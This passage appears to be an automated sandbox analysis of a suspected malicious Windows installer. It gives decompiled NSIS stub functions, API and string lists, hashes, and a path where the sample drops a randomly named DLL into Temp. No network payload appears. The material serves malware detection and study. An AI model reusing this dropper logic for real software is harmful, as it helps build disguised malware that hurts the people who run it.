						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                                                          0x0040352c
                                                                          0x0040353d
                                                                          0x00403544
                                                                          0x00403546
                                                                          0x0040355a
                                                                          0x0040355f
                                                                          0x00403575
                                                                          0x0040357a
                                                                          0x00403580
                                                                          0x00403592
                                                                          0x00403592
                                                                          0x0040359d
                                                                          0x00403548
                                                                          0x00403553
                                                                          0x00403553
                                                                          0x004035a2
                                                                          0x004035ac
                                                                          0x004035b5
                                                                          0x004035c1
                                                                          0x00403647
                                                                          0x0040364f
                                                                          0x00403651
                                                                          0x00403657
                                                                          0x00403658
                                                                          0x00403658
                                                                          0x0040366e
                                                                          0x00403674
                                                                          0x00403682
                                                                          0x00403711
                                                                          0x00403719
                                                                          0x00403723
                                                                          0x00403728
                                                                          0x0040372e
                                                                          0x004037c0
                                                                          0x004037c5
                                                                          0x004037c7
                                                                          0x004037e3
                                                                          0x00000000
                                                                          0x004037e3
                                                                          0x004037c9
                                                                          0x004037cf
                                                                          0x004037d7
                                                                          0x004037d7
                                                                          0x00000000
                                                                          0x004037cf
                                                                          0x0040373c
                                                                          0x00403748
                                                                          0x0040374e
                                                                          0x00403750
                                                                          0x00403752
                                                                          0x00403755
                                                                          0x0040375e
                                                                          0x0040375e
                                                                          0x00403766
                                                                          0x0040376e
                                                                          0x00403770
                                                                          0x00403772
                                                                          0x00403777
                                                                          0x0040377d
                                                                          0x00403780
                                                                          0x00403786
                                                                          0x0040378d
                                                                          0x0040378d
                                                                          0x004037ac
                                                                          0x004037b6
                                                                          0x00000000
                                                                          0x004037bb
                                                                          0x0040371b
                                                                          0x0040371d
                                                                          0x00000000
                                                                          0x00403688
                                                                          0x00403688
                                                                          0x0040368e
                                                                          0x00403698
                                                                          0x004036a0
                                                                          0x004036aa
                                                                          0x004036b0
                                                                          0x004036be
                                                                          0x004037e8
                                                                          0x004037e8
                                                                          0x00000000
                                                                          0x004037e8
                                                                          0x004036c4
                                                                          0x004036cd
                                                                          0x0040370c
                                                                          0x00000000
                                                                          0x0040370c
                                                                          0x004035c7
                                                                          0x004035c7
                                                                          0x004035cc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004035d6
                                                                          0x004035e5
                                                                          0x004035ea
                                                                          0x004035f1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004035f5
                                                                          0x004035f7
                                                                          0x00403604
                                                                          0x00403604
                                                                          0x0040360c
                                                                          0x00403612
                                                                          0x0040363a
                                                                          0x00403642
                                                                          0x00000000
                                                                          0x00403624
                                                                          0x00403625
                                                                          0x0040362e
                                                                          0x00403634
                                                                          0x00403635
                                                                          0x00000000
                                                                          0x00403635
                                                                          0x00403630
                                                                          0x00403632
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403632
                                                                          0x00403612

                                                                          APIs
                                                                            • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                            • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                            • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                          • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                          • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00403607
                                                                          • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                          • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                          • LoadImageA.USER32 ref: 0040366E
                                                                          • RegisterClassA.USER32 ref: 004036B5
                                                                            • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                          • CreateWindowExA.USER32 ref: 00403706
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                          • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                          • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                          • GetClassInfoA.USER32 ref: 0040376E
                                                                          • GetClassInfoA.USER32 ref: 0040377D
                                                                          • RegisterClassA.USER32 ref: 0040378D
                                                                          • DialogBoxParamA.USER32 ref: 004037AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: 'z$"C:\Users\user\Desktop\TazxfJHRhq.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                          • API String ID: 914957316-986458996
                                                                          • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                          • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                          • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                          • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 81%
                                                                          			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\hardz\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\hardz\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x328ac
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x328b0
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                                                          0x00402c42
                                                                          0x00402c45
                                                                          0x00402c4b
                                                                          0x00402c4e
                                                                          0x00402c51
                                                                          0x00402c64
                                                                          0x00402c6a
                                                                          0x00402c7d
                                                                          0x00402c82
                                                                          0x00402c85
                                                                          0x00402c8b
                                                                          0x00000000
                                                                          0x00402c8d
                                                                          0x00402c98
                                                                          0x00402ca0
                                                                          0x00402ca6
                                                                          0x00402ca8
                                                                          0x00402cad
                                                                          0x00402caf
                                                                          0x00402dde
                                                                          0x00402de0
                                                                          0x00402de6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402de8
                                                                          0x00402deb
                                                                          0x00402e0f
                                                                          0x00402e1a
                                                                          0x00402e25
                                                                          0x00402e2a
                                                                          0x00402e2d
                                                                          0x00402e2e
                                                                          0x00402e2f
                                                                          0x00402e31
                                                                          0x00402e36
                                                                          0x00402e39
                                                                          0x00402e5a
                                                                          0x00402e5e
                                                                          0x00402e64
                                                                          0x00402e66
                                                                          0x00402e66
                                                                          0x00402e66
                                                                          0x00402e6e
                                                                          0x00402e72
                                                                          0x00402e79
                                                                          0x00402e7e
                                                                          0x00402e80
                                                                          0x00402e80
                                                                          0x00402e80
                                                                          0x00402e88
                                                                          0x00402e88
                                                                          0x00402e8b
                                                                          0x00402e8c
                                                                          0x00402e8c
                                                                          0x00402e8f
                                                                          0x00402e91
                                                                          0x00402e91
                                                                          0x00402e91
                                                                          0x00402e9b
                                                                          0x00402ea1
                                                                          0x00402eaf
                                                                          0x00402eb4
                                                                          0x00000000
                                                                          0x00402eb4
                                                                          0x00402e3c
                                                                          0x00000000
                                                                          0x00402e3c
                                                                          0x00402df3
                                                                          0x00402dfe
                                                                          0x00402e03
                                                                          0x00402e05
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402e0a
                                                                          0x00402e0d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402cb5
                                                                          0x00402cb5
                                                                          0x00402cba
                                                                          0x00402cbe
                                                                          0x00402cc5
                                                                          0x00402cca
                                                                          0x00402ccc
                                                                          0x00402cce
                                                                          0x00402cce
                                                                          0x00402cd6
                                                                          0x00402cdb
                                                                          0x00402cdd
                                                                          0x00402e49
                                                                          0x00402e4d
                                                                          0x00402e52
                                                                          0x00402e52
                                                                          0x00402e42
                                                                          0x00000000
                                                                          0x00402e42
                                                                          0x00402ce5
                                                                          0x00402ceb
                                                                          0x00402d6c
                                                                          0x00402d70
                                                                          0x00402d72
                                                                          0x00402d75
                                                                          0x00402d7f
                                                                          0x00402d85
                                                                          0x00402d87
                                                                          0x00402da3
                                                                          0x00402da3
                                                                          0x00402d77
                                                                          0x00402d78
                                                                          0x00402d78
                                                                          0x00402d75
                                                                          0x00000000
                                                                          0x00402d70
                                                                          0x00402cf8
                                                                          0x00402cfd
                                                                          0x00402d00
                                                                          0x00402d06
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d0c
                                                                          0x00402d13
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d19
                                                                          0x00402d20
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d26
                                                                          0x00402d2d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d2f
                                                                          0x00402d36
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d38
                                                                          0x00402d3b
                                                                          0x00402d3d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d43
                                                                          0x00402d46
                                                                          0x00402d4c
                                                                          0x00402d50
                                                                          0x00402d56
                                                                          0x00402d5e
                                                                          0x00402d5e
                                                                          0x00402d61
                                                                          0x00402d61
                                                                          0x00402d64
                                                                          0x00402d66
                                                                          0x00402d68
                                                                          0x00402d68
                                                                          0x00000000
                                                                          0x00402d66
                                                                          0x00402d58
                                                                          0x00402d5c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402da6
                                                                          0x00402da6
                                                                          0x00402dac
                                                                          0x00402dbc
                                                                          0x00402dbc
                                                                          0x00402dbf
                                                                          0x00402dc5
                                                                          0x00402dc7
                                                                          0x00402dc7
                                                                          0x00402dcf
                                                                          0x00402dd3
                                                                          0x00402dd8
                                                                          0x00402dd8
                                                                          0x00000000
                                                                          0x00402dd3

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402C45
                                                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                            • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                            • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                          • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                          • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\TazxfJHRhq.exe" , xrefs: 00402C41
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                          • Error launching installer, xrefs: 00402C8D
                                                                          • soft, xrefs: 00402D26
                                                                          • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                          • Null, xrefs: 00402D2F
                                                                          • Inst, xrefs: 00402D19
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                          • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                          • verifying installer: %d%%, xrefs: 00402D89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                          • String ID: "C:\Users\user\Desktop\TazxfJHRhq.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                          • API String ID: 2181728824-1728303477
                                                                          • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                          • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                          • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                          • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 57%
                                                                          			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















                                                                          0x0040179d
                                                                          0x004017a4
                                                                          0x004017ad
                                                                          0x004017b0
                                                                          0x004017b3
                                                                          0x004017b8
                                                                          0x004017c0
                                                                          0x004017dc
                                                                          0x004017c2
                                                                          0x004017c2
                                                                          0x004017c3
                                                                          0x004017c3
                                                                          0x004017e2
                                                                          0x004017ec
                                                                          0x004017ec
                                                                          0x004017f0
                                                                          0x004017f3
                                                                          0x004017f8
